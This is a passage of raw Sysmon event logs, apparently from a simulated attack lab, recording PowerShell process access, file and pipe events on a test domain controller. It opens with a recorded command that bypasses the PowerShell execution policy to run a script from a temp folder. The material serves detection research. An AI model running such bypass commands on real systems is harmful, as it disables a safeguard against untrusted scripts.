"if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 10341000x80000000000000001053329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.566{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.566{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:04:23.534{466BC892-F786-60EB-CA7D-00000000CF01}9508\PSHost.132705506628667946.9508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001053326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.486{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v3uxnjxo.1tw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.470{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_whinm5ur.fce.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.390{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_whinm5ur.fce.ps12021-07-12 08:04:23.390 10341000x80000000000000001053323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.359{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf746612.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.206{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.206{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A8C8F769D9D4B1045C3DECE4CAC3EC3,SHA256=426F1DE0404A00EA61FE72CA65210381613FC465255C3C9CB3F721CB8CFEB400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DC33BDFFA918AEF5054D9BDCD1FE627,SHA256=5CE6B0E382B3DD079D60F07BD39B1570BA3C6FBC4B29A90CC4B8DA72CFD94877,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.128{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.105{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 